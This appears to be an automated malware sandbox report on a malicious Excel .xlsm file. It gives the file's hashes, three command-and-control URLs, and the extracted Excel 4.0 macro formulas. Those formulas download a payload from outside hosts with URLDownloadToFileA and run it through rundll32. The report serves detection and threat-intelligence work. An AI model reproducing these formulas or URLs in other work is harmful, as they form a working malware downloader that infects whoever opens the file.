General

  • Target

    ?i=1ynrmaxlo

  • Size

    83KB

  • MD5

    597e9be00a6e6597e041ea986dac1252

  • SHA1

    ec554fff3d8d0d18de86a1def864340963afb925

  • SHA256

    eb3e8690d152148f0bc7d306065ba030410ba35eb5e672f09041b20cf000ee4f

  • SHA512

    6cb5570a2394704f0e30c8dc9cabec9b1b5451e5035f9c0532e74ff951bd824f02f943325d41dfd56a9de1b85b816d24182aa35f75062e736809d9fb06bc59cb

  • SSDEEP

    1536:MWBsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgoRz:RG/+CbE9H78wt2E1d7e6STa6SPz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://mammy-chiro.com/case/ZTkBzbz/

http://bluetoothheadsetreview.xyz/wp-includes/xmdHAGgfki/

http://topline36.xyz/wp-includes/css/BB9Ajvjs89U9O/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mammy-chiro.com/case/ZTkBzbz/","..\dwa.ocx",0,0) =IF('RHEEHGF'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bluetoothheadsetreview.xyz/wp-includes/xmdHAGgfki/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://topline36.xyz/wp-includes/css/BB9Ajvjs89U9O/","..\dwa.ocx",0,0)) =IF('RHEEHGF'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\dwa.ocx,D""&""l""&""lR""&""egister""&""Server") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • ?i=1ynrmaxlo
    .xlsm office2007

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.